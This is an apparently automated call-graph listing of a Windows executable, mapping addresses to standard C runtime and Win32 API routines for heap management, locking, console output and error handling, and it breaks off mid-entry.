RtlLeaveCriticalSection 13418->13419 13423 41173c 13418->13423 13421 411791 13419->13421 13428 4117b5 13419->13428 13420 41179e 13426 42592a __getptd_noexit 44 API calls 13420->13426 13420->13428 13421->13420 13422 42592a __getptd_noexit 44 API calls 13421->13422 13422->13420 13423->13419 13424 42592a __getptd_noexit 44 API calls 13423->13424 13425 411761 13423->13425 13424->13425 13425->13419 13426->13428 13427 411875 13427->13372 13428->13427 13430 411879 RaiseException 13428->13430 13431 411831 13428->13431 13429 411864 RtlDeleteCriticalSection 13429->13427 13430->13372 13431->13429 13433 4234b2 GetClassInfoExA 13432->13433 13434 4233cd LoadCursorA RegisterClassExA 13432->13434 13435 4235c4 RtlLeaveCriticalSection 13433->13435 13436 4234e9 LoadCursorA RegisterClassExA 13433->13436 13434->13435 13444 423438 13434->13444 13435->13378 13436->13435 13437 423550 13436->13437 13439 4235e2 13437->13439 13440 42358c 13437->13440 13443 42356c 13437->13443 13438 42347e 13438->13433 13441 4235fa 13439->13441 13467 41fe50 RaiseException 13439->13467 13440->13435 13441->13441 13443->13440 13446 4259b8 __recalloc 50 API calls 13443->13446 13444->13433 13444->13438 13444->13439 13456 4259b8 13444->13456 13446->13440 13449 410e07 13447->13449 13448 411120 13448->13391 13449->13448 13450 410f9d GlobalAlloc 13449->13450 13774 425302 13450->13774 13453 410fb4 13454 425302 _memcpy_s 44 API calls 13453->13454 13455 411112 13453->13455 13783 41fe50 RaiseException 13453->13783 13454->13453 13455->13391 13457 4259c7 13456->13457 13458 4259ef 13456->13458 13457->13458 13459 4259d3 13457->13459 13460 425a04 13458->13460 13474 42a9ca 13458->13474 13468 427ffb 13459->13468 13487 42a7af 13460->13487 13466 4259e8 _memset 13466->13438 13467->13439 13523 4282d1 GetLastError 13468->13523 13470 4259d8 13471 42515e 13470->13471 13472 4280fe __decode_pointer 4 API calls 13471->13472 13473 42516e __invoke_watson 13472->13473 13475 42a9d6 __lseeki64 13474->13475 13476 42aa03 13475->13476 13477 42a9e6 13475->13477 13479 42aa44 RtlSizeHeap 13476->13479 13481 429cb8 __lock 44 API calls 13476->13481 13478 427ffb __lseeki64 44 API calls 13477->13478 13480 42a9eb 13478->13480 13483 42a9fb __lseeki64 13479->13483 13482 42515e __lseeki64 4 API calls 13480->13482 13484 42aa13 ___sbh_find_block 13481->13484 13482->13483 13483->13460 13738 42aa64 13484->13738 13488 42a7bb __lseeki64 13487->13488 13489 42a7c2 13488->13489 13490 42a7d0 13488->13490 13742 425aa0 13489->13742 13492 42a7e3 13490->13492 13493 42a7d7 13490->13493 13501 42a955 13492->13501 13509 42a7f0 ___sbh_resize_block ___sbh_find_block 13492->13509 13494 42592a __getptd_noexit 44 API calls 13493->13494 13495 42a7ca _realloc __lseeki64 13494->13495 13495->13466 13496 42a988 13497 428053 _malloc 4 API calls 13496->13497 13500 42a98e 13497->13500 13498 429cb8 __lock 44 API calls 13498->13509 13499 42a95a RtlReAllocateHeap 13499->13495 13499->13501 13502 427ffb __lseeki64 44 API calls 13500->13502 13501->13496 13501->13499 13503 42a9ac 13501->13503 13504 428053 _malloc 4 API calls 13501->13504 13506 42a9a2 13501->13506 13502->13495 13503->13495 13505 427ffb __lseeki64 44 API calls 13503->13505 13504->13501 13507 42a9b5 GetLastError 13505->13507 13510 427ffb __lseeki64 44 API calls 13506->13510 13507->13495 13509->13495 13509->13496 13509->13498 13511 42a87b RtlAllocateHeap 13509->13511 13512 42a8d0 RtlReAllocateHeap 13509->13512 13514 42a4ca ___sbh_alloc_block 5 API calls 13509->13514 13515 42a93b 13509->13515 13516 428053 _malloc 4 API calls 13509->13516 13518 42a91e 13509->13518 13522 429d1b HeapFree ___sbh_free_block 13509->13522 13758 42a8f3 13509->13758 13521 42a923 13510->13521 13511->13509 13512->13509 13513 42a928 GetLastError 13513->13495 13514->13509 13515->13495 13517 427ffb __lseeki64 44 API calls 13515->13517 13516->13509 13519 42a948 13517->13519 13520 427ffb __lseeki64 44 API calls 13518->13520 13519->13495 13519->13507 13520->13521 13521->13495 13521->13513 13522->13509 13537 428179 TlsGetValue 13523->13537 13526 42833e SetLastError 13526->13470 13531 428335 13569 42592a 13531->13569 13532 42831d 13555 4281ea 13532->13555 13535 428325 GetCurrentThreadId 13535->13526 13536 42833b 13536->13526 13538 4281a9 13537->13538 13539 42818e 13537->13539 13538->13526 13542 42d60f 13538->13542 13540 4280fe __decode_pointer 4 API calls 13539->13540 13541 428199 TlsSetValue 13540->13541 13541->13538 13546 42d618 13542->13546 13544 4282fc 13544->13526 13547 4280fe 13544->13547 13545 42d636 Sleep 13545->13546 13546->13544 13546->13545 13582 42b241 13546->13582 13554 428112 13547->13554 13548 428137 GetModuleHandleW 13549 428152 GetProcAddress 13548->13549 13550 428147 13548->13550 13553 42812f 13549->13553 13717 42ad25 13550->13717 13553->13531 13553->13532 13554->13548 13554->13553 13721 426fac 13555->13721 13557 4281f6 GetModuleHandleW 13558 428206 13557->13558 13559 42820c 13557->13559 13560 42ad25 __crt_waiting_on_module_handle 2 API calls 13558->13560 13561 429cb8 __lock 42 API calls 13559->13561 13560->13559 13562 428267 InterlockedIncrement 13561->13562 13722 4282bf 13562->13722 13565 429cb8 __lock 42 API calls 13566 428288 ___addlocaleref 13565->13566 13725 4282c8 13566->13725 13568 4282b3 __lseeki64 13568->13535 13571 425936 __lseeki64 13569->13571 13570 4259af _realloc __lseeki64 13570->13536 13571->13570 13573 429cb8 __lock 42 API calls 13571->13573 13581 425975 13571->13581 13572 42598a HeapFree 13572->13570 13574 42599c 13572->13574 13577 42594d ___sbh_find_block 13573->13577 13575 427ffb __lseeki64 42 API calls 13574->13575 13576 4259a1 GetLastError 13575->13576 13576->13570 13578 425967 13577->13578 13730 429d1b 13577->13730 13734 425980 13578->13734 13581->13570 13581->13572 13583 42b24d __lseeki64 13582->13583 13584 42b284 _memset 13583->13584 13585 42b265 13583->13585 13588 42b2f6 RtlAllocateHeap 13584->13588 13592 42b27a __lseeki64 13584->13592 13595 429cb8 13584->13595 13602 42a4ca 13584->13602 13608 42b33d 13584->13608 13611 428053 13584->13611 13586 427ffb __lseeki64 43 API calls 13585->13586 13587 42b26a 13586->13587 13589 42515e __lseeki64 4 API calls 13587->13589 13588->13584 13589->13592 13592->13546 13596 429ce0 RtlEnterCriticalSection 13595->13596 13597 429ccd 13595->13597 13596->13584 13614 429bf5 13597->13614 13599 429cd3 13599->13596 13640 42ad55 13599->13640 13603 42a4f8 13602->13603 13604 42a591 13603->13604 13607 42a59a 13603->13607 13705 42a031 13603->13705 13604->13607 13712 42a0e1 13604->13712 13607->13584 13716 429bde RtlLeaveCriticalSection 13608->13716 13610 42b344 13610->13584 13612 4280fe __decode_pointer 4 API calls 13611->13612 13613 428063 13612->13613 13613->13584 13615 429c01 __lseeki64 13614->13615 13616 429c27 13615->13616 13647 42b208 13615->13647 13624 429c37 __lseeki64 13616->13624 13693 42d5ca 13616->13693 13622 429c58 13627 429cb8 __lock 44 API calls 13622->13627 13623 429c49 13626 427ffb __lseeki64 44 API calls 13623->13626 13624->13599 13626->13624 13629 429c5f 13627->13629 13630 429c93 13629->13630 13631 429c67 13629->13631 13632 42592a __getptd_noexit 44 API calls 13630->13632 13698 4303e6 13631->13698 13634 429c84 13632->13634 13702 429caf 13634->13702 13635 429c72 13635->13634 13637 42592a __getptd_noexit 44 API calls 13635->13637 13638 429c7e 13637->13638 13639 427ffb __lseeki64 44 API calls 13638->13639 13639->13634 13641 42b208 __FF_MSGBANNER 44 API calls 13640->13641 13642 42ad5f 13641->13642 13643 42b05d __NMSG_WRITE 44 API calls 13642->13643 13644 42ad67 13643->13644 13645 4280fe __decode_pointer 4 API calls 13644->13645 13646 429cdf 13645->13646 13646->13596 13648 42d57f __set_error_mode 44 API calls 13647->13648 13649 42b20f 13648->13649 13650 42b21c 13649->13650 13652 42d57f __set_error_mode 44 API calls 13649->13652 13651 42b05d __NMSG_WRITE 44 API calls 13650->13651 13655 429c16 13650->13655 13653 42b234 13651->13653 13652->13650 13654 42b05d __NMSG_WRITE 44 API calls 13653->13654 13654->13655 13656 42b05d 13655->13656 13657 42b071 13656->13657 13658 42d57f __set_error_mode 41 API calls 13657->13658 13689 429c1d 13657->13689 13659 42b093 13658->13659 13660 42b1d1 GetStdHandle 13659->13660 13662 42d57f __set_error_mode 41 API calls 13659->13662 13661 42b1df _strlen 13660->13661 13660->13689 13664 42b1f8 WriteFile 13661->13664 13661->13689 13663 42b0a4 13662->13663 13663->13660 13665 42b0b6 13663->13665 13664->13689 13666 428620 _strcpy_s 41 API calls 13665->13666 13665->13689 13667 42b0d8 13666->13667 13668 42b0ec GetModuleFileNameA 13667->13668 13670 425036 __invoke_watson 10 API calls 13667->13670 13669 42b10a 13668->13669 13675 42b12d _strlen 13668->13675 13671 428620 _strcpy_s 41 API calls 13669->13671 13672 42b0e9 13670->13672 13673 42b11a 13671->13673 13672->13668 13673->13675 13676 425036 __invoke_watson 10 API calls 13673->13676 13674 42b170 13677 430fc3 _strcat_s 41 API calls 13674->13677 13675->13674 13679 431037 __mbsnbcpy_s_l 41 API calls 13675->13679 13676->13675 13678 42b183 13677->13678 13680 42b194 13678->13680 13682 425036 __invoke_watson 10 API calls 13678->13682 13681 42b15d 13679->13681 13683 430fc3 _strcat_s 41 API calls 13680->13683 13681->13674 13685 425036 __invoke_watson 10 API calls 13681->13685 13682->13680 13684 42b1a8 13683->13684 13686 42b1b9 13684->13686 13687 425036 __invoke_watson 10 API calls 13684->13687 13685->13674 13688 430e5a ___crtMessageBoxW 7 API calls 13686->13688 13687->13686 13688->13689 13690 42ada9 13689->13690 13691 42ad7e ___crtCorExitProcess GetModuleHandleW GetProcAddress 13690->13691 13692 42adb6 ExitProcess 13691->13692 13695 42d5d3 13693->13695 13694 425aa0 _malloc 43 API calls 13694->13695 13695->13694 13696 429c42 13695->13696 13697 42d5ea Sleep 13695->13697 13696->13622 13696->13623 13697->13695 13699 426fac __lseeki64 13698->13699 13700 4303f2 InitializeCriticalSectionAndSpinCount 13699->13700 13701 430436 __lseeki64 13700->13701 13701->13635 13703 429bde _doexit RtlLeaveCriticalSection 13702->13703 13704 429cb6 13703->13704 13704->13624 13706 42a044 RtlReAllocateHeap 13705->13706 13707 42a078 RtlAllocateHeap 13705->13707 13708 42a066 13706->13708 13710 42a062 13706->13710 13709 42a09b VirtualAlloc 13707->13709 13707->13710 13708->13707 13709->13710 13711 42a0b5 HeapFree 13709->13711 13710->13604 13711->13710 13713 42a0f8 VirtualAlloc 13712->13713 13715 42a13f 13713->13715 13715->13607 13715->13715 13716->13610 13718 42ad30 Sleep GetModuleHandleW 13717->13718 13719 42814d 13718->13719 13720 42ad4e 13718->13720 13719->13549 13719->13553 13720->13718 13720->13719 13721->13557 13728 429bde RtlLeaveCriticalSection 13722->13728 13724 428281 13724->13565 13729 429bde RtlLeaveCriticalSection 13725->13729 13727 4282cf 13727->13568 13728->13724 13729->13727 13731 429ffc 13730->13731 13732 429d5a 13730->13732 13731->13578 13732->13731 13733 429fc1 HeapFree 13732->13733 13733->13731 13737 429bde RtlLeaveCriticalSection 13734->13737 13736 425987 13736->13581 13737->13736 13741 429bde RtlLeaveCriticalSection 13738->13741 13740 42aa3f 13740->13479 13740->13483 13741->13740 13743 425b53 13742->13743 13751 425ab2 13742->13751 13744 428053 _malloc 4 API calls 13743->13744 13745 425b59 13744->13745 13747 427ffb __lseeki64 44 API calls 13745->13747 13746 42b208 __FF_MSGBANNER 44 API calls 13746->13751 13757 425b4b 13747->13757 13749 42b05d __NMSG_WRITE 44 API calls 13749->13751 13750 42ada9 _malloc 3 API calls 13750->13751 13751->13746 13751->13749 13751->13750 13752 425b3f 13751->13752 13753 428053 _malloc 4 API calls 13751->13753 13755 425b44 13751->13755 13751->13757 13761 425a51 13751->13761 13754 427ffb __lseeki64 44 API calls 13752->13754 13753->13751 13754->13755 13756 427ffb __lseeki64 44 API calls 13755->13756 13756->13757 13757->13495 13773 429bde RtlLeaveCriticalSection 13758->13773 13760 42a8fa 13760->13509 13762 425a5d __lseeki64 13761->13762 13763 429cb8 __lock 44 API calls 13762->13763 13764 425a8e __lseeki64 13762->13764 13765 425a73 13763->13765 13764->13751 13766 42a4ca ___sbh_alloc_block 5 API calls 13765->13766 13767 425a7e 13766->13767 13769 425a97 13767->13769 13772 429bde RtlLeaveCriticalSection 13769->13772 13771 425a9e 13771->13764 13772->13771 13773->13760 13777 425316 _memset 13774->13777 13779 425312 13774->13779 13775 42531b 13776 427ffb __lseeki64 44 API calls 13775->13776 13778 425320 13776->13778 13777->13775 13777->13779 13780 425365 13777->13780 13781 42515e __lseeki64 4 API calls 13778->13781 13779->13453 13780->13779 13782 427ffb __lseeki64 44 API calls 13780->13782 13781->13779 13782->13778 13783->13453 13785 4272c1 13784->13785 13786 4272d7 RtlEnterCriticalSection 13784->13786 13787 429cb8 __lock 44 API calls 13785->13787 13786->13404 13788 4272ca 13787->13788 13788->13404 13823 42f340 13789->13823 13793 4273b3 13793->13407 13794 427366 __flsbuf 13794->13793 13795 42d5ca __malloc_crt 44 API calls 13794->13795 13795->13793 13838 425dd8 13796->13838 13799 42748c 13800 427ffb __lseeki64 44 API calls 13799->13800 13801 427491 13800->13801 13803 42515e __lseeki64 4 API calls 13801->13803 13802 42f340 __fileno 44 API calls 13813 4274cd __aulldvrm _strlen 13802->13813 13804 4274a3 13803->13804 13849 426e9b 13804->13849 13806 427f96 13806->13409 13808 42f5e5 70 API calls _write_string 13808->13813 13809 42592a __getptd_noexit 44 API calls 13809->13813 13810 42f618 70 API calls _write_multi_char 13810->13813 13811 42f4de 48 API calls __cftof 13811->13813 13812 42f63e 70 API calls _write_string 13812->13813 13813->13799 13813->13804 13813->13808 13813->13809 13813->13810 13813->13811 13813->13812 13814 4280fe GetModuleHandleW GetProcAddress Sleep GetModuleHandleW __decode_pointer 13813->13814 13846 42f4fb 13813->13846 13814->13813 13816 4273f8 13815->13816 13817 424f66 13815->13817 13816->13817 14048 42c98c 13816->14048 13819 424f7e 13817->13819 13820 424f83 __flsbuf 13819->13820 14190 427322 13820->14190 13822 424f8e 13822->13406 13824 42f34f 13823->13824 13825 427360 13823->13825 13826 427ffb __lseeki64 44 API calls 13824->13826 13829 42f2dc 13825->13829 13827 42f354 13826->13827 13828 42515e __lseeki64 4 API calls 13827->13828 13828->13825 13830 42f2f8 13829->13830 13831 42f2e9 13829->13831 13834 427ffb __lseeki64 44 API calls 13830->13834 13836 42f31c 13830->13836 13832 427ffb __lseeki64 44 API calls 13831->13832 13833 42f2ee 13832->13833 13833->13794 13835 42f30c 13834->13835 13837 42515e __lseeki64 4 API calls 13835->13837 13836->13794 13837->13836 13839 425deb 13838->13839 13842 425e38 13838->13842 13857 42834a 13839->13857 13842->13799 13842->13802 13842->13813 13844 425e18 13844->13842 13877 42bbde 13844->13877 13847 425dd8 _LocaleUpdate::_LocaleUpdate 46 API calls 13846->13847 13848 42f50e 13847->13848 13848->13813 13850 426ea3 13849->13850 13851 426ea5 IsDebuggerPresent 13849->13851 13850->13806 14047 42807b 13851->14047 13854 42edb3 SetUnhandledExceptionFilter UnhandledExceptionFilter 13855 42edd0 __invoke_watson 13854->13855 13856 42edd8 GetCurrentProcess TerminateProcess 13854->13856 13855->13856 13856->13806 13858 4282d1 __getptd_noexit 44 API calls 13857->13858 13859 428352 13858->13859 13860 425df0 13859->13860 13861 42ad55 __amsg_exit 44 API calls 13859->13861 13860->13844 13862 42c34a 13860->13862 13861->13860 13863 42c356 __lseeki64 13862->13863 13864 42834a __getptd 44 API calls 13863->13864 13865 42c35b 13864->13865 13866 42c389 13865->13866 13868 42c36d 13865->13868 13867 429cb8 __lock 44 API calls 13866->13867 13869 42c390 13867->13869 13870 42834a __getptd 44 API calls 13868->13870 13893 42c30c 13869->13893 13875 42c372 13870->13875 13874 42c380 __lseeki64 13874->13844 13875->13874 13876 42ad55 __amsg_exit 44 API calls 13875->13876 13876->13874 13878 42bbea __lseeki64 13877->13878 13879 42834a __getptd 44 API calls 13878->13879 13880 42bbef 13879->13880 13881 429cb8 __lock 44 API calls 13880->13881 13889 42bc01 13880->13889 13882 42bc1f 13881->13882 13883 42bc68 13882->13883 13887 42bc50 InterlockedIncrement 13882->13887 13888 42bc36 InterlockedDecrement 13882->13888 14043 42bc79 13883->14043 13884 42ad55 __amsg_exit 44 API calls 13886 42bc0f __lseeki64 13884->13886 13886->13842 13887->13883 13888->13887 13890 42bc41 13888->13890 13889->13884 13889->13886 13890->13887 13891 42592a __getptd_noexit 44 API calls 13890->13891 13892 42bc4f 13891->13892 13892->13887 13894 42c310 ___addlocaleref ___removelocaleref 13893->13894 13896 42c342 13893->13896 13894->13896 13900 42c09b 13894->13900 13897 42c3b4 13896->13897 14042 429bde RtlLeaveCriticalSection 13897->14042 13899 42c3bb 13899->13875 13901 42c0b2 13900->13901 13929 42c11f 13900->13929 13904 42c0e6 13901->13904 13912 42592a __getptd_noexit 44 API calls 13901->13912 13901->13929 13902 42c16c 13914 42c193 13902->13914 13954 43155a 13902->13954 13903 42592a __getptd_noexit 44 API calls 13906 42c140 13903->13906 13908 42c107 13904->13908 13919 42592a __getptd_noexit 44 API calls 13904->13919 13909 42592a __getptd_noexit 44 API calls 13906->13909 13910 42592a __getptd_noexit 44 API calls 13908->13910 13915 42c153 13909->13915 13916 42c114 13910->13916 13911 42c1d8 13917 42592a __getptd_noexit 44 API calls 13911->13917 13918 42c0db 13912->13918 13913 42592a __getptd_noexit 44 API calls 13913->13914 13914->13911 13920 42592a 44 API calls __getptd_noexit 13914->13920 13921 42592a __getptd_noexit 44 API calls 13915->13921 13924 42592a __getptd_noexit 44 API calls 13916->13924 13925 42c1de 13917->13925 13930 431734 13918->13930 13922 42c0fc 13919->13922 13920->13914 13923 42c161 13921->13923 13946 4316ef 13922->13946 13928 42592a __getptd_noexit 44 API calls 13923->13928 13924->13929 13925->13896 13928->13902 13929->13902 13929->13903 13931 431741 13930->13931 13945 4317be 13930->13945 13932 431752 13931->13932 13933 42592a __getptd_noexit 44 API calls 13931->13933 13934 431764 13932->13934 13935 42592a __getptd_noexit 44 API calls 13932->13935 13933->13932 13936 42592a __getptd_noexit 44 API calls 13934->13936 13939 431776 13934->13939 13935->13934 13936->13939 13937 42592a __getptd_noexit 44 API calls 13940 431788 13937->13940 13938 43179a 13942 4317ac 13938->13942 13943 42592a __getptd_noexit 44 API calls 13938->13943 13939->13937 13939->13940 13940->13938 13941 42592a __getptd_noexit 44 API calls 13940->13941 13941->13938 13944 42592a __getptd_noexit 44 API calls 13942->13944 13942->13945 13943->13942 13944->13945 13945->13904 13947 431730 13946->13947 13948 4316fc 13946->13948 13947->13908 13949 43170c 13948->13949 13950 42592a __getptd_noexit 44 API calls 13948->13950 13951 43171e 13949->13951 13952 42592a __getptd_noexit 44 API calls 13949->13952 13950->13949 13951->13947 13953 42592a __getptd_noexit 44 API calls 13951->13953 13952->13951 13953->13947 13955 43156b 13954->13955 13956 42c18c 13954->13956 13957 42592a __getptd_noexit 44 API calls 13955->13957 13956->13913 13958 431573 13957->13958 13959 42592a __getptd_noexit 44 API calls 13958->13959 13960 43157b 13959->13960 13961 42592a __getptd_noexit 44 API calls 13960->13961 13962 431583 13961->13962 13963 42592a __getptd_noexit 44 API calls 13962->13963 13964 43158b 13963->13964 13965 42592a __getptd_noexit 44 API calls 13964->13965 13966 431593 13965->13966 13967 42592a __getptd_noexit 44 API calls 13966->13967 13968 43159b 13967->13968 13969 42592a __getptd_noexit 44 API calls 13968->13969 13970 4315a2 13969->13970 13971 42592a __getptd_noexit 44 API calls 13970->13971 13972 4315aa 13971->13972 13973 42592a __getptd_noexit 44 API calls 13972->13973 13974 4315b2 13973->13974 13975 42592a __getptd_noexit 44 API calls 13974->13975 13976 4315ba 13975->13976 13977 42592a __getptd_noexit 44 API calls 13976->13977 13978 4315c2 13977->13978 13979 42592a __getptd_noexit 44 API calls 13978->13979 13980 4315ca 13979->13980 13981 42592a __getptd_noexit 44 API calls 13980->13981 13982 4315d2 13981->13982 13983 42592a __getptd_noexit 44 API calls 13982->13983 13984 4315da 13983->13984 13985 42592a __getptd_noexit 44 API calls 13984->13985 13986 4315e2 13985->13986 13987 42592a __getptd_noexit 44 API calls 13986->13987 13988 4315ea 13987->13988 13989 42592a __getptd_noexit 44 API calls 13988->13989 13990 4315f5 13989->13990 13991 42592a __getptd_noexit 44 API calls 13990->13991 13992 4315fd 13991->13992 13993 42592a __getptd_noexit 44 API calls 13992->13993 13994 431605 13993->13994 13995 42592a __getptd_noexit 44 API calls 13994->13995 13996 43160d 13995->13996 13997 42592a __getptd_noexit 44 API calls 13996->13997 13998 431615 13997->13998 13999 42592a __getptd_noexit 44 API calls 13998->13999 14000 43161d 13999->14000 14001 42592a __getptd_noexit 44 API calls 14000->14001 14002 431625 14001->14002 14003 42592a __getptd_noexit 44 API calls 14002->14003 14004 43162d 14003->14004 14005 42592a __getptd_noexit 44 API calls 14004->14005 14006 431635 14005->14006 14007 42592a __getptd_noexit 44 API calls 14006->14007 14008 43163d 14007->14008 14009 42592a __getptd_noexit 44 API calls 14008->14009 14010 431645 14009->14010 14011 42592a __getptd_noexit 44 API calls 14010->14011 14012 43164d 14011->14012 14013 42592a __getptd_noexit 44 API calls 14012->14013 14014 431655 14013->14014 14015 42592a __getptd_noexit 44 API calls 14014->14015 14016 43165d 14015->14016 14017 42592a __getptd_noexit 44 API calls 14016->14017 14018 431665 14017->14018 14019 42592a __getptd_noexit 44 API calls 14018->14019 14020 43166d 14019->14020 14021 42592a __getptd_noexit 44 API calls 14020->14021 14022 43167b 14021->14022 14023 42592a __getptd_noexit 44 API calls 14022->14023 14024 431686 14023->14024 14025 42592a __getptd_noexit 44 API calls 14024->14025 14026 431691 14025->14026 14027 42592a __getptd_noexit 44 API calls 14026->14027 14028 43169c 14027->14028 14029 42592a __getptd_noexit 44 API calls 14028->14029 14030 4316a7 14029->14030 14031 42592a __getptd_noexit 44 API calls 14030->14031 14032 4316b2 14031->14032 14033 42592a __getptd_noexit 44 API calls 14032->14033 14034 4316bd 14033->14034 14035 42592a __getptd_noexit 44 API calls 14034->14035 14036 4316c8 14035->14036 14037 42592a __getptd_noexit 44 API calls 14036->14037 14038 4316d3 14037->14038 14039 42592a __getptd_noexit 44 API calls 14038->14039 14040 4316de 14039->14040 14041 42592a __getptd_noexit 44 API calls 14040->14041 14041->13956 14042->13899 14046 429bde RtlLeaveCriticalSection 14043->14046 14045 42bc80 14045->13889 14046->14045 14047->13854 14049 42c9a5 14048->14049 14050 42c9c7 14048->14050 14049->14050 14051 42f340 __fileno 44 API calls 14049->14051 14050->13817 14052 42c9c0 14051->14052 14054 430d17 14052->14054 14055 430d23 __lseeki64 14054->14055 14056 430d46 14055->14056 14057 430d2b 14055->14057 14059 430d54 14056->14059 14064 430d95 14056->14064 14079 42800e 14057->14079 14061 42800e __lseeki64 44 API calls 14059->14061 14063 430d59 14061->14063 14062 427ffb __lseeki64 44 API calls 14074 430d38 __lseeki64 14062->14074 14066 427ffb __lseeki64 44 API calls 14063->14066 14082 43341e 14064->14082 14068 430d60 14066->14068 14067 430d9b 14069 430da8 14067->14069 14070 430dbe 14067->14070 14071 42515e __lseeki64 4 API calls 14068->14071 14092 4305e4 14069->14092 14073 427ffb __lseeki64 44 API calls 14070->14073 14071->14074 14076 430dc3 14073->14076 14074->14050 14075 430db6 14151 430de9 14075->14151 14077 42800e __lseeki64 44 API calls 14076->14077 14077->14075 14080 4282d1 __getptd_noexit 44 API calls 14079->14080 14081 428013 14080->14081 14081->14062 14084 43342a __lseeki64 14082->14084 14083 433485 14085 4334a7 __lseeki64 14083->14085 14086 43348a RtlEnterCriticalSection 14083->14086 14084->14083 14087 429cb8 __lock 44 API calls 14084->14087 14085->14067 14086->14085 14088 433456 14087->14088 14089 43346d 14088->14089 14091 4303e6 __mtinitlocknum InitializeCriticalSectionAndSpinCount 14088->14091 14154 4334b5 14089->14154 14091->14089 14093 4305f3 __resetstkoflw 14092->14093 14094 43061a 14093->14094 14095 430625 14093->14095 14096 43064c 14093->14096 14098 426e9b __cftof_l 5 API calls 14094->14098 14097 42800e __lseeki64 44 API calls 14095->14097 14100 4306b4 14096->14100 14101 43068e 14096->14101 14099 43062a 14097->14099 14102 430d15 14098->14102 14104 427ffb __lseeki64 44 API calls 14099->14104 14103 4306c8 14100->14103 14158 430446 14100->14158 14105 42800e __lseeki64 44 API calls 14101->14105 14102->14075 14108 42f2dc __flsbuf 44 API calls 14103->14108 14107 430631 14104->14107 14109 430693 14105->14109 14110 42515e __lseeki64 4 API calls 14107->14110 14111 4306d3 14108->14111 14112 427ffb __lseeki64 44 API calls 14109->14112 14110->14094 14113 430979 14111->14113 14118 42834a __getptd 44 API calls 14111->14118 14114 43069c 14112->14114 14116 430989 14113->14116 14117 430c48 WriteFile 14113->14117 14115 42515e __lseeki64 4 API calls 14114->14115 14115->14094 14121 430a67 14116->14121 14140 43099d 14116->14140 14119 43095b 14117->14119 14120 430c7b GetLastError 14117->14120 14122 4306ee GetConsoleMode 14118->14122 14119->14094 14123 430cc6 14119->14123 14127 430c99 14119->14127 14120->14119 14139 430b47 14121->14139 14144 430a76 14121->14144 14122->14113 14124 430719 14122->14124 14123->14094 14126 427ffb __lseeki64 44 API calls 14123->14126 14124->14113 14125 43072b GetConsoleCP 14124->14125 14125->14119 14148 43074e 14125->14148 14128 430ce9 14126->14128 14130 430ca4 14127->14130 14131 430cb8 14127->14131 14133 42800e __lseeki64 44 API calls 14128->14133 14129 430bad WideCharToMultiByte 14129->14120 14135 430be4 WriteFile 14129->14135 14134 427ffb __lseeki64 44 API calls 14130->14134 14171 428021 14131->14171 14132 430a0b WriteFile 14132->14120 14132->14140 14133->14094 14141 430ca9 14134->14141 14138 430c1b GetLastError 14135->14138 14135->14139 14136 430aeb WriteFile 14136->14120 14136->14144 14138->14139 14139->14119 14139->14123 14139->14129 14139->14135 14140->14119 14140->14123 14140->14132 14143 42800e __lseeki64 44 API calls 14141->14143 14143->14094 14144->14119 14144->14123 14144->14136 14145 4307fa WideCharToMultiByte 14145->14119 14147 43082b WriteFile 14145->14147 14146 4336c1 48 API calls __fassign 14146->14148 14147->14120 14147->14148 14148->14119 14148->14120 14148->14145 14148->14146 14149 4334e5 11 API calls __putwch_nolock 14148->14149 14150 43087f WriteFile 14148->14150 14168 42f533 14148->14168 14149->14148 14150->14120 14150->14148 14189 4334be RtlLeaveCriticalSection 14151->14189 14153 430df1 14153->14074 14157 429bde RtlLeaveCriticalSection 14154->14157 14156 4334bc 14156->14083 14157->14156 14176 4333a7 14158->14176 14160 430464 14161 43047d SetFilePointer 14160->14161 14162 43046c 14160->14162 14164 430495 GetLastError 14161->14164 14166 430471 14161->14166 14163 427ffb __lseeki64 44 API calls 14162->14163 14163->14166 14165 43049f 14164->14165 14164->14166 14167 428021 __dosmaperr 44 API calls 14165->14167 14166->14103 14167->14166 14169 42f4fb __isleadbyte_l 46 API calls 14168->14169 14170 42f542 14169->14170 14170->14148 14172 42800e __lseeki64 44 API calls 14171->14172 14173 42802c _realloc 14172->14173 14174 427ffb __lseeki64 44 API calls 14173->14174 14175 42803f 14174->14175 14175->14094 14177 4333b4 14176->14177 14178 4333cc 14176->14178 14179 42800e __lseeki64 44 API calls 14177->14179 14180 42800e __lseeki64 44 API calls 14178->14180 14188 433411 14178->14188 14181 4333b9 14179->14181 14182 4333fa 14180->14182 14183 427ffb __lseeki64 44 API calls 14181->14183 14184 427ffb __lseeki64 44 API calls 14182->14184 14185 4333c1 14183->14185 14186 433401 14184->14186 14185->14160 14187 42515e __lseeki64 4 API calls 14186->14187 14187->14188 14188->14160 14189->14153 14191 427332 14190->14191 14192 427345 RtlLeaveCriticalSection 14190->14192 14195 429bde RtlLeaveCriticalSection 14191->14195 14192->13822 14194 427342 14194->13822 14195->14194 14197 411191 DeleteObject 14196->14197 14198 41119c 14196->14198 14197->14198 14199 4111b0 DeleteObject 14198->14199 14202 4111bb 14198->14202 14199->14202 14200 4113bc 14202->14200 14203 411207 14202->14203 14218 411450 14202->14218 14205 42592a __getptd_noexit 44 API calls 14203->14205 14207 4112ca 14203->14207 14211 411244 14203->14211 14204 411285 14208 4112a6 14204->14208 14212 42592a __getptd_noexit 44 API calls 14204->14212 14205->14203 14206 4112c0 14239 41fe50 RaiseException 14206->14239 14209 41116e 14208->14209 14213 423d8e 2 API calls 14208->14213 14209->13416 14215 423d8e 14209->14215 14211->14204 14211->14206 14230 4113d0 14211->14230 14212->14204 14213->14209 14327 423cad 14215->14327 14217 423d9b 14217->13416 14219 41153a 14218->14219 14224 411463 14218->14224 14229 411546 14219->14229 14252 41fe50 RaiseException 14219->14252 14221 41165f 14221->14202 14222 411708 14223 42592a __getptd_noexit 44 API calls 14223->14229 14224->14222 14224->14224 14224->14229 14240 423acb 14224->14240 14227 41166e 14253 41fe50 RaiseException 14227->14253 14229->14221 14229->14223 14229->14229 14232 4113d8 14230->14232 14238 411403 14230->14238 14231 41142c 14231->14211 14233 41143b 14232->14233 14237 4113d0 45 API calls 14232->14237 14232->14238 14326 41fe50 RaiseException 14233->14326 14235 42592a __getptd_noexit 44 API calls 14235->14238 14236 411445 14237->14232 14238->14231 14238->14235 14239->14207 14242 424fc2 14240->14242 14241 425aa0 _malloc 44 API calls 14241->14242 14242->14241 14243 41152d 14242->14243 14244 428053 _malloc 4 API calls 14242->14244 14247 424fe8 std::bad_alloc::bad_alloc 14242->14247 14243->14219 14243->14227 14244->14242 14245 42500e 14257 41e020 14245->14257 14247->14245 14254 426b6a 14247->14254 14251 425026 14252->14229 14253->14229 14263 426b2e 14254->14263 14256 426b77 14256->14245 14311 